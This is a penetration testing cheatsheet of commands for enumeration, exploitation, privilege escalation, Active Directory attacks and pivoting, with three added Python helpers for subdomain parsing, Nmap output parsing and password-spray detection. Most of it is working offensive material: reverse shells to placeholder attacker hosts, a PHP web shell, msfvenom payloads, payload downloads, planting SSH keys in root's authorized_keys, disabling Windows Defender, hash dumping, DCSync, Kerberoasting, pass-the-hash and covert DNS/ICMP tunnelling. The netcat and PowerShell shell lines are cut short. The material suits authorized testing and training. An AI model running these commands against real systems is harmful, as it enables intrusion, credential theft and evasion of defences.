Penetration Testing Cheatsheet
Phase 1: Information Gathering & Enumeration
Gathering information and mapping the target environment, from external infrastructure to specific running services.
Infrastructure-based Enumeration
curl -s https://crt.sh/\?q\=<domain>\&output\=json | jq .
Use Certificate Transparency logs to find subdomains.
subfinder -d <domain.tld> -v
Discover subdomains using passive sources.
ffuf -w subdomains.txt:FUZZ -u https://FUZZ.<domain>
Brute-force subdomains using a wordlist.
gobuster dns -d <domain> -w <wordlist>
Brute-force subdomains using Gobuster.
for i in $(cat ips.txt); do shodan host $i; done
Scan a list of IP addresses using the Shodan CLI.
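The crt.sh query at the top of this section returns a JSON array in which each entry's "name_value" field can hold several names separated by newlines, wildcard names appear as "*.domain", and case varies, so piping it straight into jq leaves cleanup to you. The following is an added example, not code from the original cheatsheet: it parses that JSON into a de-duplicated list of in-scope hostnames and separately lists which CAs have issued wildcard certificates, a useful exposure check when the domain is your own. SAMPLE_CRTSH_JSON is a constructed sample in the crt.sh response shape.

```python
"""Parse crt.sh JSON output into a clean subdomain list (added example)."""
import json

# Constructed sample shaped like crt.sh's "output=json" response.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "*.example.com",
     "name_value": "*.example.com\nMAIL.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "common_name": "vpn.example.com",
     "name_value": "vpn.example.com."},
    # Looks related but is a different registrable domain: must be rejected.
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "example.com.evil.test",
     "name_value": "example.com.evil.test"},
])


def subdomains_from_crtsh(raw_json: str, domain: str) -> list:
    """Return sorted, de-duplicated hostnames that are `domain` or end in `.domain`.

    Wildcard prefixes are stripped (a cert for *.example.com only proves the
    apex is in scope), names are lowercased, trailing dots are removed, and
    hostnames that merely contain the domain as a substring are rejected.
    """
    domain = domain.lower().rstrip(".")
    found = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]
            if name == domain or name.endswith("." + domain):
                found.add(name)
    return sorted(found)


def wildcard_issuers(raw_json: str) -> dict:
    """Map each CA that issued a wildcard certificate to the wildcard names seen.

    Wildcard certificates widen the blast radius of a single key compromise,
    so they are worth listing separately when reviewing your own domain.
    """
    seen = {}
    for entry in json.loads(raw_json):
        names = [n for n in entry.get("name_value", "").split("\n")
                 if n.startswith("*.")]
        if names:
            seen.setdefault(entry.get("issuer_name", "?"), set()).update(names)
    return {issuer: sorted(names) for issuer, names in seen.items()}


if __name__ == "__main__":
    for host in subdomains_from_crtsh(SAMPLE_CRTSH_JSON, "example.com"):
        print(host)
    print(wildcard_issuers(SAMPLE_CRTSH_JSON))
```

To use it on live data, save the curl output from the page to a file and pass its contents as raw_json; the suffix check (not a substring match) is what keeps look-alike domains out of the result.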
Host Scanning & Service Discovery
nmap -sV -sC -oA nmap/initial <TARGET_IP>
Standard Scan: Runs default scripts (-sC), probes for versions (-sV), and saves output.
nmap -p- --min-rate=1000 -oA nmap/all_ports <TARGET_IP>
All TCP Ports Scan: Scans all 65,535 TCP ports quickly.
nmap --script <script-name> -p <port> <TARGET_IP>
Run a specific Nmap script (e.g., smb-os-discovery.nse).
locate scripts/
Find available Nmap scripts on your system.
netcat -nv -w 1 -z <TARGET_IP> 22
Grab the banner of an open port using Netcat.
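The -oA option used in the scans above writes three files, one of them the greppable .gnmap format, which is the easiest to feed into later phases. The following is an added example, not code from the original cheatsheet: it parses a .gnmap file into open ports per host and lets you ask which hosts expose a given service. SAMPLE_GNMAP is a constructed sample in the gnmap layout (port/state/protocol/owner/service/rpc-info/version per entry).

```python
"""Parse Nmap greppable (.gnmap) output into open ports per host (added example)."""
from collections import defaultdict

# Constructed sample in the layout nmap -oA writes to <basename>.gnmap.
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated Mon Jan  1 12:00:00 2024 as: "
    "nmap -sV -sC -oA nmap/initial 10.10.10.5 10.10.10.6\n"
    "Host: 10.10.10.5 ()\tStatus: Up\n"
    "Host: 10.10.10.5 ()\tPorts: "
    "22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/, "
    "443/closed/tcp//https///, "
    "3306/filtered/tcp//mysql///\tIgnored State: closed (996)\n"
    "Host: 10.10.10.6 (files.internal)\tStatus: Up\n"
    "Host: 10.10.10.6 (files.internal)\tPorts: "
    "445/open/tcp//microsoft-ds//Samba smbd 4.6.2/, "
    "139/open/tcp//netbios-ssn//Samba smbd 4.6.2/\tIgnored State: closed (998)\n"
    "# Nmap done at Mon Jan  1 12:01:00 2024 -- 2 IP addresses (2 hosts up) "
    "scanned in 60.00 seconds\n"
)


def parse_gnmap(text: str) -> dict:
    """Return {ip: [(port, proto, service, version), ...]} for open ports only.

    Each "Host:" line carries tab-separated sections; the "Ports:" section is a
    comma-separated list of slash-delimited fields. Closed and filtered ports
    are dropped; the list per host is sorted by port number.
    """
    results = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue
        host_field, rest = line.split("\t", 1)
        ip = host_field.split()[1]
        ports_field = rest.split("\t")[0][len("Ports: "):]
        for entry in ports_field.split(", "):
            port, state, proto, _owner, service, _rpc, version = entry.split("/")[:7]
            if state == "open":
                results[ip].append((int(port), proto, service, version.strip()))
        results[ip].sort()
    return dict(results)


def hosts_running(parsed: dict, service: str) -> list:
    """List (ip, port) pairs where the named service is open, sorted by ip."""
    return sorted((ip, port) for ip, ports in parsed.items()
                  for port, _proto, svc, _ver in ports if svc == service)


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    for ip, ports in scan.items():
        for port, proto, service, version in ports:
            print(f"{ip}\t{port}/{proto}\t{service}\t{version}")
    print("SMB hosts:", hosts_running(scan, "microsoft-ds"))
```

Nmap escapes slashes inside version strings before writing gnmap, so splitting on "/" is safe; the one thing to remember when adapting this is that hosts with no open ports still appear as "Status: Up" lines and are intentionally skipped here.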
Web Enumeration
ffuf -w <wordlist>:FUZZ -u http://<TARGET>/FUZZ
Directory/File Fuzzing: The modern standard for finding web content.
gobuster dir -u http://<TARGET>/ -w <wordlist>
An alternative for directory and file brute-forcing.
whatweb <TARGET_IP>
Identify technologies, CMS, frameworks, and server software.
curl -IL <URL>
Grab website headers to identify server and framework versions.
curl http://<TARGET>/robots.txt
Check robots.txt for disallowed paths that may be interesting.
View Page Source
Ctrl+U in Firefox/Chrome
Service-Specific Enumeration
FTP (Port 21)
ftp <TARGET_IP>
Connect and interact with the FTP service.
nc -nv <TARGET_IP> 21
Connect with Netcat to manually issue FTP commands.
wget -m --no-passive ftp://anonymous:anonymous@<TARGET_IP>
Mirror (download) all files from an anonymous FTP server.
openssl s_client -connect <TARGET_IP>:21 -starttls ftp
Connect to FTP over an encrypted TLS channel (FTPS).
SMB (Ports 139, 445)
smbclient -N -L \\\\<TARGET_IP>\\
List SMB shares using a null session (no credentials).
smbclient \\\\<TARGET_IP>\\<share_name>
Connect to a specific SMB share.
smbmap -H <TARGET_IP>
Enumerate SMB shares and permissions.
crackmapexec smb <TARGET_IP> --shares -u '' -p ''
Use CrackMapExec to enumerate shares via a null session.
enum4linux-ng.py <TARGET_IP> -A
Comprehensive SMB enumeration (users, shares, policies, etc.).
rpcclient -U "" <TARGET_IP>
Interact with the target via RPC (e.g., for user enumeration).
samrdump.py <TARGET_IP>
Attempt to dump user information via SAMR.
NFS (Port 2049)
showmount -e <TARGET_IP>
Show available/mountable NFS shares from the target.
mount -t nfs <TARGET_IP>:/<share> /mnt/nfs -o nolock
Mount the remote NFS share to a local directory.
umount /mnt/nfs
Unmount the NFS share.
DNS (Port 53)
dig any <domain> @<nameserver>
Request ANY record type from a specific nameserver.
dig axfr <domain> @<nameserver>
Attempt a Zone Transfer: Can dump all DNS records for the domain.
dnsenum --dnsserver <ns> -f <wordlist> <domain>
Perform brute-forcing and other enumeration checks.
SMTP (Port 25)
telnet <TARGET_IP> 25
Manually connect to the SMTP server to issue commands.
nmap <TARGET_IP> -p25 -sV --script smtp*
Run all Nmap SMTP scripts against the target.
for u in $(cat u.txt); do echo VRFY $u | nc -nvw 1 <IP> 25; done
Enumerate valid users by piping a list to the VRFY command.
IMAP (143, 993) & POP3 (110, 995)
openssl s_client -connect <TARGET_IP>:imaps
Connect to the secure IMAPS service.
openssl s_client -connect <TARGET_IP>:pop3s
Connect to the secure POP3S service.
curl -v -k 'imaps://<URL>' --user <user>:<pass>
Log in to IMAPS service using cURL to test credentials.
Common IMAP Commands (after connecting):
a LOGIN user pass
a LIST "" *
a SELECT INBOX
a FETCH <ID> all
a LOGOUT
Common POP3 Commands (after connecting):
USER user
PASS pass
STAT
LIST
RETR <id>
QUIT
SNMP (Port 161)
snmpwalk -v2c -c <community> <TARGET_IP>
Query all OIDs (Object Identifiers) using a known community string.
onesixtyone -c community-strings.txt <TARGET_IP>
Brute-force SNMP community strings from a dictionary file.
SQL Databases (MySQL 3306, MSSQL 1433, Oracle 1521)
nmap -p3306 -sV --script mysql* <TARGET_IP>
Enumerate MySQL with Nmap scripts.
mysql -u <user> -p<pass> -h <TARGET_IP>
Connect to a MySQL server.
nmap -p1433 -sV --script ms-sql* <TARGET_IP>
Enumerate MSSQL with Nmap scripts.
mssqlclient.py <user>@<TARGET_IP> -windows-auth
Connect to MSSQL using Windows Authentication with Impacket.
python3 ./odat.py all -s <TARGET_IP>
Perform a full enumeration scan on an Oracle Database.
sqlplus <user>/<pass>@<TARGET_IP>/<db>
Connect to an Oracle database.
Common SQL Commands:
SHOW DATABASES;
USE <database>;
SHOW TABLES;
SELECT * FROM <table>;
MSSQL xp_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; xp_cmdshell 'whoami';
Remote Management
SSH
ssh-audit.py <TARGET_IP>
Audit SSH server configuration for security issues.
ssh <user>@<TARGET_IP> -i private.key
Log in to SSH using a private key.
RDP
nmap -p3389 -sV --script rdp-* <TARGET_IP>
Enumerate RDP with Nmap scripts.
xfreerdp /u:<user> /p:<pass> /v:<TARGET_IP>
Connect to an RDP server from Linux.
WinRM
evil-winrm -i <TARGET_IP> -u <user> -p <password>
Connect to a target with a full-featured PowerShell session.
WMI
wmiexec.py <user>:"<pass>"@<TARGET_IP> "whoami"
Execute commands over WMI using Impacket.
Phase 2: Gaining Access (Exploitation)
Leveraging vulnerabilities to gain an initial foothold.
Exploit Research & Execution
searchsploit <service> <version>
Search the local Exploit-DB database for public exploits.
msfconsole
Start the Metasploit Framework.
search <exploit_name>
Search for exploits within Metasploit.
use <exploit_module_path>
Load a specific Metasploit module.
show options
Show the required options for the loaded module.
set RHOSTS <TARGET_IP>
Set the remote host (target) IP address.
check
Test if the target is likely vulnerable without exploiting.
exploit / run
Execute the exploit against the target.
Listeners & Shells
Setting up a Listener
nc -lvnp <PORT>
Start a Netcat listener to catch a reverse shell.
rlwrap nc -lvnp <PORT>
Use rlwrap for a better shell with history and arrow-key support.
Reverse Shell Payloads
Bash
bash -c 'bash -i >& /dev/tcp/<YOUR_IP>/<PORT> 0>&1'
Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f
PowerShell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('<YOUR_IP>',<PORT>);..."
(shortened for brevity)
Python
python -c 'import pty; pty.spawn("/bin/bash")'
PHP Web Shell
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php
Connecting to Shells
nc <TARGET_IP> <PORT>
Connect to a bind shell listening on the target.
curl http://<TARGET>/shell.php?cmd=id
Execute a command using an uploaded web shell.
MSFvenom Payload Generation
Linux
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
Web (PHP)
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
Web (WAR)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
Phase 3: Post-Exploitation & Privilege Escalation
Actions taken after gaining initial access to escalate privileges and gather more information.
Shell Stabilisation & TTY Upgrade
1. Spawn TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
Use Python to get a better shell. script /dev/null -c bash is an alternative.
2. Background
Ctrl+Z
Background the current shell session.
3. Set Term
stty raw -echo; fg
On your attacker machine, set terminal to raw mode, then foreground the shell. Hit enter.
4. Set Vars
export TERM=xterm-256color; export SHELL=bash
In the target shell, set environment variables for a full-featured terminal.
File Transfers
HTTP Server
python3 -m http.server 80
wget http://<ATTACKER_IP>/file
or curl -o file http://<ATTACKER_IP>/file
SCP
scp local_file user@<TARGET_IP>:/tmp
scp user@<ATTACKER_IP>:/path/file /tmp
PowerShell
(Serve file via HTTP)
Invoke-WebRequest http://<IP>/file.exe -OutFile C:\Temp\file.exe
Certutil
(Serve file via HTTP)
certutil.exe -urlcache -split -f http://<IP>/file.exe C:\Temp\file.exe
Base64
base64 shell.sh -w 0
(Copy paste) echo <base64_string>
Linux Privilege Escalation
sudo -l
Crucial: Check what commands you can run as root or other users without a password.
find / -type f -perm -04000 -ls 2>/dev/null
Find SUID binaries. Check GTFOBins for exploitation methods.
./linpeas.sh / ./lse.sh
Run automated enumeration scripts to find privesc vectors.
sudo su -
Switch to root user if (ALL : ALL) ALL is present in sudo -l.
ssh-keygen -f key
Create an SSH key pair.
echo "<public_key>" >> /root/.ssh/authorized_keys
Add your public key to root's authorized keys if you have write access.
ssh root@<TARGET_IP> -i key
SSH in as root using your generated private key.
Windows Privilege Escalation & Post-Exploitation
whoami /priv
Check for enabled privileges, especially SeImpersonatePrivilege.
systeminfo
Check OS version and hotfixes for missing patches (kernel exploits).
accesschk.exe -uwcqv "Authenticated Users" *
Use Sysinternals tools to find weak folder/file permissions.
Get-MpComputerStatus
Check the status of Windows Defender.
Set-MpPreference -DisableRealtimeMonitoring $true
(Requires admin) Disable Windows Defender real-time monitoring.
Metasploit Meterpreter
sysinfo
Show system information.
getsystem
Attempt various techniques to escalate to SYSTEM privileges.
ps
List running processes.
migrate <PID>
Migrate into a more stable process (e.g., explorer.exe).
hashdump
Dump password hashes from the SAM database.
upload <local_path> <remote_path>
Upload a file to the target.
download <remote_path> <local_path>
Download a file from the target.
shell
Drop into a standard system command shell.
sessions -l
List active sessions.
sessions -i <ID>
Interact with a specific session.
Phase 4: Active Directory Attacks
Techniques specific to Windows Domain environments.
Initial AD Enumeration
responder -I <interface> -A
Passively listen for NetBIOS-NS/LLMNR requests to capture hashes.
./kerbrute_linux_amd64 userenum -d <DOMAIN> --dc <DC_IP> <userlist>
Enumerate valid usernames via Kerberos pre-authentication.
crackmapexec smb <DC_IP> --pass-pol
Enumerate the domain password policy.
ldapsearch -h <DC_IP> -x -b "DC=<domain>,DC=<local>"
Perform an anonymous LDAP query to enumerate domain objects.
bloodhound-python -u <user> -p <pass> -d <domain> -ns <DC_IP> -c all
Run the BloodHound collector to map the domain.
Credential Attacks & Lateral Movement
Password Spraying
crackmapexec smb <DC_IP> -u <userlist> -p '<password>'
Kerberoasting
GetUserSPNs.py <DOMAIN>/<USER> -request -outputfile hashes.txt
AS-REP Roasting
GetNPUsers.py <DOMAIN>/ -usersfile <userlist> -format hashcat -no-pass
Pass-The-Hash
impacket-psexec -hashes :<ntlm_hash> <user>@<TARGET_IP>
DCSync
secretsdump.py -just-dc-user <user_to_dump> <DOMAIN>/<USER>:<PASS>@<DC_IP>
PrintNightmare
python3 CVE-2021-1675.py <domain>/<user>:<pass>@<TARGET> '\\<ATTACKER_IP>\share\payload.dll'
PetitPotam + ADCS
ntlmrelayx.py -t http://<CA_SERVER>/certsrv/certfnsh.asp --adcs --template DomainController
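The credential attacks listed above have a distinctive footprint on the defensive side: password spraying shows up as one source failing logons across many different accounts in a short window, whereas a brute-force against one account produces many failures for a single user. The following is an added example, not part of the original cheatsheet, that implements that distinction as a sliding-window detection over failed-logon records. The records are a constructed, simplified one-line-per-event rendering of Windows Event ID 4625 (failed logon); the field names src= and user= are assumptions for this example, not a real export format.

```python
"""Detect password spraying in failed-logon records (added example)."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: "<timestamp> <event_id> src=<ip> user=<account>".
# 10.10.5.23 sprays six accounts in six seconds; 10.10.7.4 hammers one account
# (brute force, not spray); 10.10.9.9 fails five accounts spread over two hours.
SAMPLE_FAILED_LOGONS = """\
2024-03-01T09:00:01Z 4625 src=10.10.5.23 user=alice
2024-03-01T09:00:02Z 4625 src=10.10.5.23 user=bob
2024-03-01T09:00:03Z 4625 src=10.10.5.23 user=carol
2024-03-01T09:00:04Z 4625 src=10.10.5.23 user=dave
2024-03-01T09:00:05Z 4625 src=10.10.5.23 user=erin
2024-03-01T09:00:06Z 4625 src=10.10.5.23 user=Frank
2024-03-01T09:01:00Z 4624 src=10.10.5.23 user=frank
2024-03-01T09:05:00Z 4625 src=10.10.7.4 user=carol
2024-03-01T09:05:01Z 4625 src=10.10.7.4 user=carol
2024-03-01T09:05:02Z 4625 src=10.10.7.4 user=carol
2024-03-01T09:05:03Z 4625 src=10.10.7.4 user=carol
2024-03-01T09:05:04Z 4625 src=10.10.7.4 user=carol
2024-03-01T09:05:05Z 4625 src=10.10.7.4 user=carol
2024-03-01T09:05:06Z 4625 src=10.10.7.4 user=carol
2024-03-01T09:05:07Z 4625 src=10.10.7.4 user=carol
2024-03-01T08:00:00Z 4625 src=10.10.9.9 user=alice
2024-03-01T08:30:00Z 4625 src=10.10.9.9 user=bob
2024-03-01T09:00:00Z 4625 src=10.10.9.9 user=carol
2024-03-01T09:30:00Z 4625 src=10.10.9.9 user=dave
2024-03-01T10:00:00Z 4625 src=10.10.9.9 user=erin
"""


def parse_records(text: str) -> list:
    """Return [(timestamp, src_ip, username), ...] for 4625 events only.

    Successful logons (4624) are ignored; usernames are lowercased so that
    case variations of one account are not counted as distinct targets.
    """
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, src, user = line.split()
        if event_id != "4625":
            continue
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       src.split("=", 1)[1], user.split("=", 1)[1].lower()))
    return events


def detect_password_spray(events: list, window: timedelta = timedelta(minutes=10),
                          min_users: int = 5) -> dict:
    """Return {src_ip: peak_distinct_users} for sources that fail logons for at
    least `min_users` different accounts within any `window`-long span.

    A two-pointer sliding window per source keeps a running count of distinct
    usernames, so a single account failing many times never trips the rule.
    """
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((ts, user))
    flagged = {}
    for src, evs in by_src.items():
        evs.sort()
        counts, start, peak = Counter(), 0, 0
        for ts, user in evs:
            counts[user] += 1
            while ts - evs[start][0] > window:   # evict events older than the window
                old = evs[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            peak = max(peak, len(counts))
        if peak >= min_users:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    for src, n in detect_password_spray(parse_records(SAMPLE_FAILED_LOGONS)).items():
        print(f"possible password spray from {src}: {n} distinct accounts")
```

The window and threshold are the knobs to tune: a short window with a moderate threshold catches the fast, noisy spray shown here, while a long window with a low threshold is what picks up a slow "one attempt per account per hour" spray at the cost of more false positives from shared NAT addresses.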
Pivoting, Tunnelling & Port Forwarding
1. Internal Reconnaissance & Situational Awareness
Before pivoting, understand the network from the perspective of the compromised host.
Network Configuration & Routing
ifconfig / ip addr
(Linux) Display all current network interface configurations.
ipconfig /all
(Windows) Display all system network configurations, including DNS and DHCP servers.
netstat -r / route -n
(Linux/Windows) Display the local IP routing table to identify known networks and gateways.
Internal Host Discovery (Ping Sweeps)
Linux (Bash)
for i in {1..254}; do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
Windows (CMD)
for /L %i in (1,1,254) do @ping -n 1 -w 100 172.16.5.%i | find "Reply"
PowerShell
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}
Metasploit
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
Use a Metasploit post-exploitation module to discover live hosts on internal subnets.
2. Port Forwarding & Tunnelling Techniques
Create pathways from your attacker machine into the target's internal network.
SSH Tunnelling (The Classic Method)
Requires an SSH server running on the pivot host.
Local Port Forwarding
ssh -L <LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT> <user>@<PIVOT_IP>
ssh -L 3306:172.16.5.20:3306 user@<PIVOT_IP>
Forwards a port from your local machine through the pivot to a target machine. Useful for accessing a single service (e.g., a database on port 3306).
Remote Port Forwarding
ssh -R <REMOTE_PORT>:<TARGET_IP>:<TARGET_PORT> <user>@<PIVOT_IP>
ssh -R 8080:127.0.0.1:80 user@<PIVOT_IP>
Forwards a port from the pivot host back to your attacker machine. Useful for catching reverse shells from hosts that can only reach the pivot.
Dynamic Port Forwarding (SOCKS Proxy)
ssh -D <LOCAL_PORT> <user>@<PIVOT_IP>
ssh -D 9050 user@<PIVOT_IP>
Creates a versatile SOCKS proxy on your local machine that tunnels traffic through the pivot. This is the foundation for using tools like ProxyChains.
Metasploit Port Forwarding & Routing
Used when you have a Meterpreter session on the pivot host.
use post/multi/manage/autoroute
Sets up routing rules within Metasploit to route traffic for internal subnets through the active Meterpreter session.
portfwd add -l <local_port> -p <target_port> -r <target_ip>
(Local Forward) Forwards a local port on your attacker machine to a target in the internal network.
portfwd add -R -l <pivot_port> -p <attacker_port> -L <attacker_ip>
(Remote Forward) Forwards a port on the pivot host back to a listener on your attacker machine.
help portfwd
Displays all options for the portfwd command within Meterpreter.
Windows Native Port Forwarding
netsh interface portproxy add v4tov4 listenport=<p_port> connectaddress=<t_ip> connectport=<t_port>
Creates a persistent TCP port proxy on a Windows pivot host.
netsh interface portproxy show v4tov4
Displays the current port proxy configuration.
3. Proxying Traffic Through Tunnels
Once a SOCKS proxy is established, use these tools to route your other applications through it.
ProxyChains-NG (Linux)
tail -4 /etc/proxychains4.conf
Check the configuration file to ensure your proxy is listed (e.g., socks5 127.0.0.1 9050).
proxychains nmap -v -Pn -sT 172.16.5.19
Run an Nmap scan through the proxy. The full-connect scan (-sT) is required because a SOCKS proxy only carries complete TCP connections, not raw SYN packets; -Pn is crucial as ICMP (ping) usually fails over proxies.
proxychains msfconsole
Start Metasploit with all its network traffic routed through the proxy.
proxychains xfreerdp /v:<TARGET_IP> /u:<user> /p:<pass>
Connect to an internal Windows host via RDP through the proxy.
Plink (Windows)
plink.exe -D <LOCAL_PORT> <user>@<PIVOT_IP>
(From Windows) Uses PuTTY's plink.exe to create an SSH-based SOCKS proxy, similar to ssh -D.
4. Advanced Tunnelling Tools
Versatile tools for creating robust tunnels and network relays.
Chisel
Server
./chisel server -v -p 1234 --socks5
A fast TCP/UDP tunnel over HTTP. Start the server on your attacker machine.
Client
./chisel client -v <ATTACKER_IP>:1234 socks
Run the client on the pivot host to connect back and establish the SOCKS proxy.
sshuttle
Client
sshuttle -r <user>@<PIVOT_IP> <INTERNAL_SUBNET>
sshuttle -r user@pivot 172.16.5.0/24 -v
"The poor man's VPN." Forwards all traffic for a specified subnet through an SSH session, without requiring admin rights on the pivot.
socat
Relay
socat TCP4-LISTEN:<l_port>,fork TCP4:<t_ip>:<t_port>
A powerful network relay. This example listens on a port and forwards all traffic to a target.
rpivot
Server
python2.7 server.py --proxy-port 9050 --server-port 9999
A reverse SOCKS proxy. The server runs on the attacker machine.
Client
python2.7 client.py --server-ip <ATTACKER_IP> --server-port 9999
The client runs on the pivot and connects out, creating a proxy for the attacker.
5. Covert Tunnelling (Firewall Evasion)
Use these when standard TCP/UDP traffic is blocked.
dnscat2
DNS
Server
sudo ruby dnscat2.rb --dns "host=<ATTACKER_IP>,domain=<domain.tld>"
Client
Start-Dnscat2 -DNSserver <ATTACKER_IP> -Domain <domain.tld> -Exec cmd
ptunnel-ng
ICMP
Server
sudo ./ptunnel-ng -r<PIVOT_IP> -R<PORT>
Client
sudo ./ptunnel-ng -p<PIVOT_IP> -l<LOCAL_PORT> -r<PIVOT_IP> -R<REMOTE_PORT>
6. Pivoting Workflow & Supporting Commands
Essential commands for transferring payloads and managing connections during a pivoting engagement.
Verify Tunnel
netstat -antp | grep <PORT>
On your attacker machine, verify that your local port forward or SOCKS proxy is listening.
Scan via Tunnel
nmap -v -sV -p1234 localhost
Scan the local port you forwarded to enumerate the service on the internal target.
Payload Gen
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<PIVOT_IP> ...
When generating a payload for a host inside the network, LHOST must be an IP the target can reach (often the pivot's IP).
File Transfer
scp payload.exe user@<PIVOT_IP>:~
Use scp to transfer tools and payloads to the pivot machine.
python3 -m http.server 8123
Start a quick web server on the pivot machine to serve payloads to other internal hosts.
Invoke-WebRequest -Uri "http://<PIVOT_IP>:8123/p.exe" -OutFile "p.exe"
Use PowerShell on an internal Windows host to download a payload from the pivot.